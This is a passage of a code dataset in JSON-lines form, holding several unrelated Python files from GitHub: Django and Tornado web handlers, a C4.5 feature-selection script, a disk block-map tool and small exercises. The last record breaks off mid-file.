+{"seq_id":"19316251233","text":"import datetime\nimport glob\nimport os\nimport sys\nimport time\n\nfrom django.core.management.base import BaseCommand\n\nfrom src.settings import *\nfrom src.models import *\nfrom src.console import send_notify_emails\n\n\nclass Command(BaseCommand):\n help = 'Cleans up old job results from database and folders.'\n\n def add_arguments(self, parser):\n parser.add_argument('--days', type=int, help='Days in the past considered obsolete, default 3 month is 90.')\n\n def handle(self, *args, **options):\n t0 = time.time()\n self.stdout.write('%s:\\t%s' % (time.ctime(), ' '.join(sys.argv)))\n N_days = options['days'] if options['days'] else KEEP_JOB * 30\n\n t = time.time()\n self.stdout.write(\"Cleaning up obsolete job results...\")\n\n all_job = JobIDs.objects.filter(date__range=(datetime.date(1970, 1, 2), datetime.date.today() - datetime.timedelta(days=N_days)))\n N_obsolete = 0\n\n for job in all_job:\n try:\n if job.type == '1':\n obj = Design1D.objects.get(job_id=job.job_id)\n elif job.type == '2':\n obj = Design2D.objects.get(job_id=job.job_id)\n elif job.type == '3':\n obj = Design3D.objects.get(job_id=job.job_id)\n\n obj.delete()\n for f in glob.glob('%s/data/%sd/result_%s.*') % (MEDIA_ROOT, job.type, job.job_id):\n os.remove(f)\n except Exception:\n pass\n\n job.delete()\n N_obsolete += 1\n\n\n all_files = set()\n N_orphan = 0\n for i in xrange(3):\n for f in glob.glob('%s/data/%sd/result_*.*' % (MEDIA_ROOT, i + 1)):\n all_files.add(f[f.find('/result_') - 2: f.rfind('.')])\n\n for f in all_files:\n job_id = f[f.find('result_') + 7:]\n job_type = f[:f.find('/') - 1]\n if job_type == '1':\n obj = Design1D.objects.filter(job_id=job_id)\n elif job_type == '2':\n obj = Design2D.objects.filter(job_id=job_id)\n elif job_type == '3':\n obj = Design3D.objects.filter(job_id=job_id)\n\n if not len(obj):\n for ff in glob.glob('%s/data/%s.*' % (MEDIA_ROOT, f)):\n os.remove(ff)\n try:\n job = JobIDs.objects.get(job_id=job_id)\n job.delete()\n N_orphan += 1\n except Exception:\n pass\n\n self.stdout.write(\" \\033[92mSUCCESS\\033[0m: \\033[94m%s\\033[0m obsolete job result files removed.\" % N_obsolete)\n self.stdout.write(\" \\033[92mSUCCESS\\033[0m: \\033[94m%s\\033[0m orphan job result files removed.\" % N_orphan)\n self.stdout.write(\"Time elapsed: %.1f s.\\n\" % (time.time() - t))\n\n if not DEBUG:\n t_now = datetime.datetime.now().strftime('%b %d %Y (%a) @ %H:%M:%S')\n send_notify_emails('{%s} SYSTEM: Quarterly Cleanup Notice' % env('SERVER_NAME'), 'This is an automatic email notification for the success of scheduled quarterly cleanup of the %s Server local results.\\n\\nThe crontab job is scheduled at 00:00 (UTC) on 1st day of every 3 months.\\n\\nThe last system backup was performed at %s (PDT).\\n\\n%s Admin\\n' % (env('SERVER_NAME'), t_now, env('SERVER_NAME')))\n self.stdout.write(\"Admin email (Quarterly Cleanup Notice) sent.\")\n\n self.stdout.write(\"All done successfully!\")\n self.stdout.write(\"Time elapsed: %.1f s.\" % (time.time() - t0))\n","repo_name":"DasLab/Server_Primerize","sub_path":"src/management/commands/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"21487124382","text":"from django.urls import path\nfrom items.views import item_list_view, item_create_view, item_dynamic_lookup_view, item_base_view, my_item_view, edit_item_view\n\nurlpatterns = [\n\n path('create/', item_create_view, name='createitem'),\n path('/', item_dynamic_lookup_view, name='lookupitem'),\n path('myitem/', my_item_view, name='myitem'),\n path('edit//', edit_item_view, name='edititem'),\n]\n","repo_name":"eddylau328/tradable","sub_path":"Tradable/items/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8939046298","text":"import requests\nimport json\nimport os\nimport operator\n\ndata = requests.get(\"http://etcweb.princeton.edu/mobile/map/json.php\")\ncontent = data.content\nlocations = json.loads(content)[\"location\"]\n#We want to reorganize how the loaded json is key-valued\nd = {}\nfor loc in locations:\n code = int(loc[\"location_code\"])\n del loc[\"location_code\"]\n d[code] = loc\n#Now we save line by line\nf = open(os.path.join(os.path.dirname(__file__), \"../campus_map_bldgs_info.py\"), \"w\")\nf.write(\"campus_info = {\\n\")\nl = sorted(d.items(), key=operator.itemgetter(0))\nfor k,v in l:\n f.write(\" %d: {\\n\" % k)\n for k1,v1 in v.iteritems():\n if type(v1) == unicode:\n if \"'\" in v1:\n f.write(u\" u'%s': u'''%s''',\\n\" % (unicode(k1),unicode(v1)))\n else:\n f.write(u\" u'%s': u'%s',\\n\" % (unicode(k1),unicode(v1)))\n else:\n if type(v1) == list and len(v1) > 0 and type(v1[0]) == dict:\n v1 = sorted(v1, key=operator.methodcaller('get', 'name'))\n f.write(u\" u'%s': %s,\\n\" % (unicode(k1),unicode(v1)))\n f.write(\" },\\n\")\nf.write(\"}\")\nf.close()\n\n","repo_name":"epkugelmass/USG-srv-dev","sub_path":"tigerapps/pom/scripts/makeBldgsInfo.py","file_name":"makeBldgsInfo.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"38797325376","text":"import csv\nimport math\nimport numpy as np\nfrom collections import defaultdict\nimport random\nimport naive_bayes_data\n\n#total_documents = 0.0\nwriter_list = ['austen','dickens','shakespeare','et-al']\n# writers = {}\n# writer_word_counts = {}\n# encountered_words = set()\n# dev_data = {}\n# dev_data_size = 0.0\n\n\n\"\"\"\nRandomly removes 10% of the data for purposes of testing parameters and features\n\"\"\"\ndef split_10_data(full_data):\n data_10_per = {}\n data_90_per = {}\n for writer in writer_list:\n doc_list = list(full_data[writer])\n docs_10_per = [doc_list.pop(random.randrange(len(doc_list))) for i in range(int(len(doc_list)/10.0))]\n data_10_per[writer] = docs_10_per\n data_90_per[writer] = doc_list\n return data_90_per, data_10_per\n\n\ndef expected_information(sample_sizes):\n exp_inf = 0.0\n total_sample_size = sum(sample_sizes) * 1.0\n if total_sample_size == 0:\n return 0\n probs = [sample_sizes[i]/total_sample_size for i in range(len(sample_sizes))]\n for prob in probs:\n if prob != 0:\n exp_inf += prob * math.log(prob,2)\n return -1 * exp_inf\n \n\n\ndef entropy(word,sample):\n has_word = []\n no_has_word = []\n for author in sample:\n has_word.append(0.0)\n no_has_word.append(0.0)\n for doc in sample[author]:\n if word in doc:\n has_word[-1] += 1\n else:\n no_has_word[-1] += 1\n ent = 0.0\n total_docs = sum(has_word) + sum(no_has_word)\n ent += sum(has_word)/total_docs * expected_information(has_word)\n ent += sum(no_has_word)/total_docs * expected_information(no_has_word)\n return ent\n\ndef information_gain(word,sample):\n sample_sizes = [len(sample[author]) for author in sample]\n return expected_information(sample_sizes) - entropy(word,sample)\n\n\ndef split_information(word,sample):\n has_word = []\n no_has_word = []\n for author in sample:\n has_word.append(0.0)\n no_has_word.append(0.0)\n for doc in sample[author]:\n if word in doc:\n has_word[-1] += 1\n else:\n no_has_word[-1] += 1\n total_docs = sum(has_word) + sum(no_has_word)\n split = 0.0\n if sum(has_word) != 0:\n split += sum(has_word)/total_docs * math.log(sum(has_word)/total_docs,2)\n if sum(no_has_word) != 0:\n split += sum(no_has_word)/total_docs * math.log(sum(no_has_word)/total_docs,2)\n return -1 * split\n\ndef gain_ratio(word,sample):\n split_info = split_information(word,sample)\n info_gain = information_gain(word,sample)\n if split_info == 0:\n return 0\n return info_gain/split_info\n\n\ndef c45(sample,depth,encountered_words,split_words):\n best_ratio = (0.0,'')\n for word in encountered_words:\n if word in split_words:\n continue\n word_ratio = gain_ratio(word,sample)\n if word_ratio > best_ratio[0]:\n best_ratio = (word_ratio,word)\n if best_ratio[0] == 0:\n return []\n attr = best_ratio[1]\n if depth < 2:\n has_attr = {}\n no_has_attr = {}\n has_attr_length = 0.0\n no_has_attr_length = 0.0\n for author in sample:\n has_attr[author] = []\n no_has_attr[author] = []\n for doc in sample[author]:\n if attr in doc:\n has_attr[author].append(doc)\n has_attr_length += 1\n else:\n no_has_attr[author].append(doc)\n no_has_attr_length += 1\n left_words = []\n right_words = []\n new_split_words = split_words + [attr]\n if has_attr_length > 0:\n left_words = c45(has_attr,depth + 1,encountered_words,new_split_words)\n if no_has_attr_length > 0:\n right_words = c45(no_has_attr,depth + 1,encountered_words,new_split_words)\n return [attr] + left_words + right_words\n else:\n return [attr]\n\n\n\ndef main():\n data_holder = naive_bayes_data.naive_bayes_data(['austen','dickens','shakespeare','et-al'])\n used_features = set()\n for i in range(10):\n print('starting new iteration')\n data_90,data_10 = split_10_data(data_holder.writers)\n used_features.update(set(c45(data_10,0,data_holder.encountered_words,[])))\n print(used_features)\n\n\nif __name__ == '__main__':\n main()","repo_name":"matsonb/Data_Mining","sub_path":"tree-selection.py","file_name":"tree-selection.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17808702599","text":"from django.utils.translation import gettext as _\nfrom django.contrib.auth.models import User\n\nimport uuid\nfrom loguru import logger\nfrom datetime import datetime\nfrom slugify import slugify\nimport os\nimport shutil\nimport re\nfrom zipfile import ZipFile\n\nfrom .exceptions import *\nfrom .models import *\nfrom .logic import *\nfrom .forms import *\nfrom tid_portal import settings\n\n__all__ = ['SongManager', 'ProjectEventManager', 'ProjectManager', 'TabulatureManager',\n 'ProjectResourceFileManager', 'ProjectURLManager', 'ProjectTaskManager']\n\nlogger.add(settings.BASE_DIR + \"/debug.log\", format=\"{time} {level} {message}\", rotation=\"2 week\", compression=\"zip\")\n\n\nclass SongManager():\n \"\"\" Manages songs - create/update songs, manage live list content and ordering \"\"\"\n\n\n @staticmethod\n def update_song_by_post_data(request_POST: dict, request_FILES: dict) -> bool:\n \"\"\" Check request data and update song. Return True on successifully save, otherwise False \"\"\"\n\n song_id = request_POST.get('song_id', False)\n song_name = request_POST.get('song_name', False)\n song_tempo = request_POST.get('song_tempo', False)\n song_artist = request_POST.get('song_artist', False)\n if(song_id):\n song = Song.objects.get(pk = song_id)\n logger.info(\"Updating existing song by POST data\")\n elif(song_name and song_tempo and song_artist):\n song = Song()\n logger.info(\"Creating song by POST data\")\n\n if(song):\n song.played_now = request_POST.get('song_played', False)\n song.artist = song_artist\n song.name = song_name\n song.tempo = song_tempo\n # Handle tab\n song_tabulature = request_POST.get('song_tabulature', False)\n if(request_FILES and 'song_tabulature_file' in request_FILES):\n song_tabulature_file = request_FILES['song_tabulature_file'] #.POST.get('song_tabulature_file', False)\n if(song_tabulature and song_tabulature != 'None'):\n song.tabulature = Tabulature.objects.get(pk = song_tabulature)\n elif(request_FILES and 'song_tabulature_file' in request_FILES and song_tabulature_file):\n tabulature = Tabulature()\n tabulature.name = \"{} - {}\".format(song.artist, song.name)\n tabulature.save()\n tabulature.create_tabulature_file(song_tabulature_file, True)\n song.tabulature = tabulature\n else:\n song.tabulature = None\n\n song_lyrics = request_POST.get('song_lyrics', False)\n if(song_lyrics and song_lyrics != 'None'):\n song.lyrics = Lyrics.objects.get(pk = song_lyrics)\n elif (request_FILES and 'song_lyrics_file' in request_FILES):\n song_lyrics_file = request_FILES['song_lyrics_file']\n lyrics = Lyrics()\n lyrics.file.save(song_lyrics_file.name, song_lyrics_file)\n lyrics.save()\n song.lyrics = lyrics\n else:\n song.lyrics = None\n #\n song.save()\n return True\n return False\n\n @staticmethod\n def live_list_update(request_POST: dict) -> bool:\n \"\"\" Update live list ordering \"\"\"\n\n ordering = request_POST.get('ordering', False)\n songs = Song.objects.all()\n for song in songs:\n song.live_position = 0\n song.save()\n position = 1\n for i in ordering.split(','):\n song = Song.objects.get(pk=i)\n song.live_position = position\n song.save()\n position+=1\n\n\nclass ProjectEventManager:\n \"\"\" Manages ProjectEvents creation\"\"\"\n\n\n @staticmethod\n def create_event(request_POST: dict, project_slug: str, user: User) -> bool:\n \"\"\" Create project event by user note \"\"\"\n\n project = Project.objects.get(slug=project_slug)\n logger.info(\"Creating new event for project {project.name}\")\n projectevent_note = request_POST.get('projectevent_note', False)\n if (projectevent_note):\n project_event = ProjectEvent()\n project_event.author = user\n project_event.note = projectevent_note.strip()\n project_event.project = project\n project_event.pub_date = datetime.now()\n project_event.save()\n return True\n return False\n\n @staticmethod\n def create_event_by_status(request_POST: dict, project_slug: str, user: User) -> bool:\n \"\"\" Create project event by user note \"\"\"\n\n project = Project.objects.get(slug=project_slug)\n logger.info(\"Creating new event by status change for project {project.name}\")\n projectevent_note = \"\"\n status_changed = False\n\n status_categories = StatusCategory.objects.order_by('id')\n for category in status_categories:\n current_project_status = ProjectStatusCategory.objects.filter(project=project, category_id=category.id).first()\n value = request_POST[\"status_{}\".format(category.id)]\n if(current_project_status.status.id != int(value)):\n current_project_status.status = StatusValue.objects.get(id=value)\n current_project_status.save()\n projectevent_note = \"{}\\n{}: {} {}.\".format(projectevent_note,\n current_project_status.category,\n _(\"status changed to\"),\n current_project_status.status)\n status_changed = True\n if (projectevent_note):\n project_event = ProjectEvent()\n project_event.author = user\n project_event.note = projectevent_note.strip()\n project_event.project = project\n project_event.pub_date = datetime.now()\n if (status_changed):\n project_event.save()\n return True\n return False\n\n\nclass ProjectManager:\n \"\"\" Manages Project creation \"\"\"\n\n\n @staticmethod\n def project_create(request_POST: dict) -> str:\n \"\"\" Create new project from POST request \"\"\"\n\n logger.info(\"Creating new project\")\n project_name = request_POST.get('project_name', False)\n if (project_name):\n project = Project()\n project.name = project_name\n project.slug = slugify(project_name)\n project.save()\n return project.slug\n return \"\"\n\n @staticmethod\n def project_rename(request_POST: dict, project: Project):\n \"\"\" Rename existing project by POST request \"\"\"\n\n logger.info(\"Renaming project\")\n project_name = request_POST.get('project_name', False)\n check_project = Project.objects.filter(name=project_name).first()\n if(check_project):\n raise ProjectNameAllreadyExists\n if (project_name):\n project.name = project_name\n project.slug = slugify(project_name)\n project.save()\n return project.slug\n return \"\"\n\n @staticmethod\n def add_lyrics(project_slug: str, request_POST: dict, request_FILES: dict) -> bool:\n \"\"\" Create new Lyrics or add existing to project \"\"\"\n\n logger.info(\"Adding lyrics to project\")\n project = Project.objects.get(slug=project_slug)\n project_lyrics = request_POST.get('project_lyrics', False)\n if (project_lyrics and project_lyrics != 'None'):\n project.lyrics = Lyrics.objects.get(pk=project_lyrics)\n elif (request_FILES and 'project_lyrics_file' in request_FILES):\n project_lyrics_file = request_FILES['project_lyrics_file']\n lyrics = Lyrics()\n lyrics.file.save(project_lyrics_file.name, project_lyrics_file)\n lyrics.save()\n project.lyrics = lyrics\n else:\n project.lyrics = None\n project.save()\n return True\n\n @staticmethod\n def add_tabulature(project_slug: str, request_POST: dict, request_FILES: dict) -> bool:\n \"\"\" Create tabulature related to project \"\"\"\n\n logger.info(\"Adding tabulature to project\")\n project = Project.objects.get(slug=project_slug)\n project_tabulature = request_POST.get('project_tabulature', False)\n if(project_tabulature and project_tabulature != 'None'):\n tabulature = Tabulature.objects.get(id=project_tabulature)\n project.tabulature = tabulature\n elif(request_FILES and 'project_tabulature_file' in request_FILES):\n project_tabulature_file = request_FILES['project_tabulature_file']\n tabulature = Tabulature()\n tabulature.name = \"{}\".format(project.name)\n tabulature.save()\n tabulature.create_tabulature_file(project_tabulature_file, True)\n project.tabulature = tabulature\n else:\n project.tabulature = None\n project.save()\n return True\n\n\nclass TabulatureManager:\n \"\"\" Manages Tabulatures and tabulature files \"\"\"\n\n\n @staticmethod\n def create_tabulature_by_post(request_POST: dict, request_FILES: dict):\n \"\"\" Create new tabulature with new tabulature file \"\"\"\n\n logger.info(\"Creating new tabulature with file\")\n form = TabulatureForm(request_POST, request_FILES)\n if(form.is_valid()):\n tab_name = form.data['tab_name']\n tab_file = request_FILES['tab_file']\n tabulature = Tabulature()\n tabulature.name = tab_name\n tabulature.save()\n tabulature.create_tabulature_file(tab_file, True)\n\n @staticmethod\n def file_actuality_change(tabulature_file_id: uuid.UUID):\n \"\"\" Toggle tabulature file actuality \"\"\"\n\n logger.info(\"Toggling tabulature file actuality\")\n tabulature_file = TabulatureFile.objects.get(pk=tabulature_file_id)\n tabulature_file.is_actual = not tabulature_file.is_actual\n tabulature_file.save()\n\n @staticmethod\n def file_delete(tabulature_file_id: uuid.UUID):\n \"\"\" Delete tabulature file from Tabulature \"\"\"\n\n logger.info(\"Deleting tabulature file\")\n tabulature_file = TabulatureFile.objects.get(pk=tabulature_file_id)\n tabulature_file.delete()\n\n @staticmethod\n def file_add(tabulature_id: uuid.UUID, request_FILES: dict):\n \"\"\" Add new file to Tabulature \"\"\"\n\n logger.info(\"Adding tabulature file to existing Tabulature\")\n song_tabulature_file = request_FILES['song_tabulature_file']\n if (song_tabulature_file):\n tabulature = Tabulature.objects.get(pk=tabulature_id)\n tabulature.create_tabulature_file(song_tabulature_file, True)\n\n @staticmethod\n def tabulature_archive(username: str, code: int) -> str:\n \"\"\"\n create archive from all actual tabulatures, return archive path\n code - defines songs set: 1 - actual, 2 - not actual\n \"\"\"\n\n directory_name = os.path.join(settings.MEDIA_ROOT, username+\"_archive_tmp\")\n try:\n os.mkdir(directory_name)\n except FileExistsError:\n pass\n\n archive_directory_name = os.path.join(settings.MEDIA_ROOT, username+\"_archive\")\n if(os.path.isdir(archive_directory_name)):\n shutil.rmtree(archive_directory_name)\n os.mkdir(archive_directory_name)\n\n actual_tabulatures = {}\n\n if(code == 1):\n archive_name_base = \"takeitdown_actual\"\n song_list = Song.objects.played_only_on_practice()\n elif(code == 2):\n archive_name_base = \"takeitdown_notactual\"\n song_list = Song.objects.not_played()\n\n # choose actual tabulatures\n for song in song_list:\n if(song.tabulature is None):\n continue\n count = song.tabulature.tab_files.count()\n if(count == 0):\n continue\n for tab in song.tabulature.tab_files.all():\n similarity_counter = 0\n while True:\n search_result = re.search(\"\\.([\\w\\d]+)$\", tab.file.path)\n extension = search_result.group(1)\n new_name = \"{} - {}.{}\".format(song.artist, song.name, extension)\\\n if similarity_counter == 0 \\\n else \"{} - {} {}.{}\".format(song.artist, song.name, similarity_counter, extension)\n\n if(new_name not in actual_tabulatures):\n break\n similarity_counter += 1\n\n actual_tabulatures[new_name] = tab.file.path\n\n # copy tabulatures to directory\n new_files = []\n for new_file_name, filename in actual_tabulatures.items():\n shutil.copyfile(filename, \"{}\\\\{}\".format(directory_name, new_file_name))\n new_files.append(new_file_name)\n\n # archive files\n archive_name = archive_name_base + datetime.now().strftime(\"_%Y_%m_%d__%H%M\") + \".zip\"\n archive_path = os.path.join(settings.MEDIA_ROOT, archive_directory_name, archive_name)\n with ZipFile(archive_path, \"w\") as archive:\n for file in new_files:\n archive.write(\"{}\\\\{}\".format(directory_name, file), file)\n\n\n # delete files\n shutil.rmtree(directory_name)\n\n return archive_path\n\n\nclass ProjectResourceFileManager:\n \"\"\" Manages project resource files \"\"\"\n\n\n @staticmethod\n def create_project_resource_file(project_slug: str, request_POST: dict, request_FILES: dict) -> bool:\n \"\"\" Create file related to project \"\"\"\n\n logger.info(\"Creating new project resource file\")\n project = Project.objects.get(slug=project_slug)\n file_description = request_POST.get('project_file_description', False)\n if(file_description and\n request_FILES and\n 'project_file' in request_FILES):\n file = request_FILES['project_file']\n resource_file = ProjectResourceFile()\n resource_file.description = file_description\n resource_file.file = file\n resource_file.project = project\n resource_file.save()\n return True\n return False\n\n\nclass ProjectURLManager:\n \"\"\" Manages project related URLs \"\"\"\n\n\n @staticmethod\n def create_project_related_url(project_slug: str, request_POST: dict) -> bool:\n \"\"\" Create URL related to project \"\"\"\n\n logger.info(\"Creating new project related URL\")\n project = Project.objects.get(slug=project_slug)\n url_description = request_POST.get('project_url_description', False)\n url_path = request_POST.get('project_url_path', False)\n if(url_description and url_path):\n related_url = ProjectRelatedURL()\n related_url.description = url_description\n related_url.url = url_path\n related_url.project = project\n related_url.save()\n return True\n return False\n\n\nclass ProjectTaskManager:\n \"\"\" Manages Project tasks - creation, toggle on finished\"\"\"\n\n @staticmethod\n def create_from_post(request_post: dict, project: Project):\n\n task = ProjectTask()\n task.project = project\n user_ids = request_post.getlist(\"users\")\n task.description = request_post[\"description\"]\n task.save()\n for id in user_ids:\n user = User.objects.get(id=id)\n task.responsible_persons.add(user)\n\n task.save()\n\n #task.responsible_persons.add\n #task.save()\n\n @staticmethod\n def check_finished():\n pass\n","repo_name":"IAmMaxNotARobot/band_portal","sub_path":"tid_portal/band_portal/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":15696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14472677695","text":"__author__ = 'KevinMortonMacPro'\n\nimport db_access\nimport db_utility\n\nareas = db_access.get_all_areas()\n\n# Formatting\ntemplate = \"{:>5} {:20} {:<20} {:.5} {:<20} \"\nrow = template.format(\"ID\", \"Area Name\", \"# of locations\", \"Avg Value\", \"Category\")\nprint(row)\n\n# ------------------------------------| Formatting functions |------------------------------------\ndef getCategoryString(aList):\n # Pass a list of categories to get a formatted comma separated string \n categoryString = ''\n theCategory = []\n\n try:\n for i in aList:\n theCategory.append(i['name'])\n countString = len(area_category)\n\n for i in theCategory:\n categoryString += i\n if countString > 1:\n categoryString += ', '\n countString += -1\n except TypeError:\n categoryString = ''\n return categoryString\n\n# ------------------------------------| Pretty Print |----------------------------------------------\nfor area in areas:\n area_id = area['area_id']\n area_location = db_access.get_locations_for_area(area_id)\n area_category = db_access.get_categories_for_area(area_id)\n avgMeasurementString = str( db_utility.get_average_measurements_for_area(area_id))\n\n if not db_utility.get_average_measurements_for_area(area_id):\n avgMeasurementString = '--------'\n\n # Final output\n row = template.format(area_id, area['name'], len(area_location), avgMeasurementString,getCategoryString(area_category))\n\n print(row)","repo_name":"kevnm67/InternetProgrammingFall2015","sub_path":"Assignment_3/dbclasses/db_report.py","file_name":"db_report.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18848952564","text":"import argparse\nimport json\nimport logging\nimport sys\n\nfrom pprint import pprint, pformat\n\nfrom . ext4 import get_unused_blocks_ext4\nfrom . ntfs import get_unused_blocks_ntfs\nfrom . xfs import get_unused_blocks_xfs\n\n\ndef prepare_logging(args):\n log_level = logging.ERROR\n\n if args.silent:\n log_level = logging.INFO\n elif args.verbose:\n log_level = max(0, logging.ERROR - 10 * int(args.verbose))\n\n logging.basicConfig(\n stream=sys.stderr,\n level=log_level,\n format=\"[%(levelname)s] [%(asctime)s] %(message)s\")\n\n\ndef get_unused_blocks_from_fs(part, bs):\n fs = part.get(\"fs\")\n\n if fs is None:\n return None\n\n fns = {\n \"ext4\": get_unused_blocks_ext4,\n \"xfs\": get_unused_blocks_xfs,\n \"ntfs\": get_unused_blocks_ntfs,\n }\n\n fn = fns.get(fs[\"name\"])\n\n if fn is None:\n return None\n\n return fn(fs, bs)\n\n\ndef generate_unused_blocks(meta, bs):\n pt = meta.get(\"partitions\")\n\n if pt is None:\n return get_unused_blocks_from_fs(meta, bs)\n\n assert pt['label'] in ['gpt', 'dos']\n assert pt['unit'] == 'sectors' # TODO\n\n unused_sectors = pt.get(\"unpartitioned\", [])\n\n sector_size = meta[\"sector_size\"]\n\n assert sector_size == bs\n\n unused_blocks = unused_sectors\n\n # if sector_size == bs:\n # unused_blocks = unused_sectors\n # else:\n # logging.info(f\"convert unpartitioned space from {sector_size} to {bs} block size\")\n # unused_blocks = [\n # (\n # x * sector_size // bs,\n # y * sector_size // bs\n # ) for x, y in unused_sectors]\n\n logging.debug(f\"unpartitioned space (in {bs} blocks) ({len(unused_blocks)}):\")\n logging.debug(pformat(unused_blocks))\n\n for part in pt[\"partitions\"]:\n offset_bytes = part['start'] * sector_size\n\n assert offset_bytes % bs == 0\n\n offset = (offset_bytes + bs - 1) // bs\n\n blocks = get_unused_blocks_from_fs(part, bs)\n\n logging.debug(f\"partition {part['node']} unused blocks ({len(blocks) if blocks else 0}):\")\n\n if blocks is not None:\n blocks = [(offset + s, offset + e) for s, e in blocks]\n unused_blocks += blocks\n\n logging.debug(pformat(blocks))\n\n return unused_blocks\n\n\ndef generate_used_blocks(path):\n meta = {}\n\n with open(path) as f:\n meta = json.load(f)\n\n bs = meta[\"block_size\"]\n sz = meta[\"size\"]\n\n default_block_size = 512\n\n assert bs != 0 and sz != 0\n assert bs >= 4096\n assert sz % default_block_size == 0\n\n unused_blocks = generate_unused_blocks(meta, default_block_size)\n if not unused_blocks:\n return None\n\n unused_blocks.sort(key=lambda x: x[0])\n\n used_blocks = []\n\n start = 0\n end = sz // default_block_size\n\n for b, e in unused_blocks:\n if start < b:\n used_blocks.append((start, b))\n start = e\n\n if start < end:\n used_blocks.append((start, end))\n\n if bs != default_block_size:\n return [(\n (x * default_block_size) // bs, # round down\n (y * default_block_size + bs - 1) // bs, # round up\n ) for x, y in used_blocks]\n\n return used_blocks\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--meta-file\", type=str, required=True)\n parser.add_argument(\"--format\", choices=[\"python\", \"json\"])\n\n parser.add_argument(\"-s\", '--silent', help=\"silent mode\", default=0, action='count')\n parser.add_argument(\"-v\", '--verbose', help=\"verbose mode\", default=0, action='count')\n\n args = parser.parse_args()\n\n prepare_logging(args)\n\n used_blocks = generate_used_blocks(args.meta_file)\n\n if args.format == \"json\":\n json.dump(used_blocks, sys.stdout, indent=4)\n else:\n pprint(used_blocks)\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"ydb-platform/nbs","sub_path":"cloud/blockstore/tools/fs/gen_used_blocks_map/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"6"} +{"seq_id":"9650287750","text":"from tornado.web import RequestHandler\r\nfrom tornado.web import gen\r\nfrom controller import sugarGuideController\r\nimport json\r\n\r\n\r\n# 保存糖导的结果\r\nclass AddSugarGuideResult(RequestHandler):\r\n @gen.coroutine\r\n def post(self):\r\n session_id = self.get_argument('session_id')\r\n gender = self.get_argument('gender')\r\n age = self.get_argument('age')\r\n height = self.get_argument('height')\r\n weight = self.get_argument('weight')\r\n sugarType = self.get_argument('sugarType')\r\n diseaseAge = self.get_argument('diseaseAge')\r\n akin = self.get_argument('akin')\r\n fm = self.get_argument('fm')\r\n manyDrinkWc = self.get_argument('manyDrinkWc')\r\n posion = self.get_argument('posion')\r\n thirsty = self.get_argument('thirsty')\r\n visionDown = self.get_argument('visionDown')\r\n diseaseSpeed = self.get_argument('diseaseSpeed')\r\n verifyYear = self.get_argument('verifyYear')\r\n cureWay = self.get_argument('cureWay')\r\n dsPlan = self.get_argument('dsPlan')\r\n complication = self.get_argument('complication')\r\n\r\n data = sugarGuideController.createHealthWeekly(session_id, gender, age, height, weight,\r\n sugarType, diseaseAge, akin, fm,\r\n manyDrinkWc, posion, thirsty,\r\n visionDown, diseaseSpeed, verifyYear,\r\n cureWay, dsPlan, complication)\r\n self.write(json.dumps(data))\r\n\r\n# 获取健康周报\r\nclass GetHealthWeekly(RequestHandler):\r\n @gen.coroutine\r\n def post(self):\r\n session_id = self.get_argument('session_id')\r\n data = sugarGuideController.retireveHealthWeekly(session_id)\r\n self.render('healthWeekly.html', cerealsValue=data['diet']['cerealsValue'],\r\n cereals=data['diet']['cereals'],fruitValue=data['diet']['fruitValue'],\r\n fruit=data['diet']['fruit'],meatValue=data['diet']['meatValue'],\r\n meat=data['diet']['meat'],milkValue=data['diet']['milkValue'],\r\n milk=data['diet']['milk'],fatValue=data['diet']['fatValue'],\r\n fat=data['diet']['fat'],vegetablesValue=data['diet']['vegetablesValue'],\r\n vegetables=data['diet']['vegetables'],\r\n sport1=data['sport']['sport1'],sport2=data['sport']['sport2'],\r\n sport3=data['sport']['sport3'],sport4=data['sport']['sport4'],\r\n time1=data['sport']['time1'], time2=data['sport']['time2'],\r\n time3=data['sport']['time3'], time4=data['sport']['time4'],\r\n week1=data['sport']['week1'], week2=data['sport']['week2'],\r\n week3=data['sport']['week3'], week4=data['sport']['week4'],\r\n min1=data['control']['min1'],max1=data['control']['max1'],\r\n min2=data['control']['min2'],max2=data['control']['max2'],\r\n sleep1=data['control']['sleep1'],sleep2=data['control']['sleep2'],)\r\n","repo_name":"zhuxiyulu/sugar","sub_path":"handlers/sugarGuideHandler.py","file_name":"sugarGuideHandler.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"41285341350","text":"class student:\r\n holidays=23\r\n print(\"hello\")\r\nvariable1=student()\r\nvariable2=student()\r\nvariable1.name=\"sarthak\"\r\nvariable1.Class='college'\r\n#print(variable1.holidays)\r\n#print(variable2.holidays)\r\nprint(variable1)\r\n\r\ntext = \"Python tutorial for absolute beginners.\"\r\nt = text.split()\r\nprint(t)\r\n\r\n","repo_name":"sarthaklikhwar/my-work-in-python","sub_path":"code16.py","file_name":"code16.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"42134668615","text":"import math\n\nfrom scipy.stats import bernoulli\nimport numpy as np\ndef binomial_coefficient(n, k):\n return math.factorial(n) / (math.factorial(k) * math.factorial(n - k))\n\ndef probability_of_3_heads(n, p):\n k = 3 # Number of heads\n q = 1 - p # Probability of getting a tail\n probability = binomial_coefficient(n, k) * (p ** k) * (q ** (n - k))\n return probability\n\nn = 8 # Total number of coin tosses\np = 0.5 # Probability of getting a head in one coin toss\n\nresult = probability_of_3_heads(n, p)\nprint(f\"The probability of getting 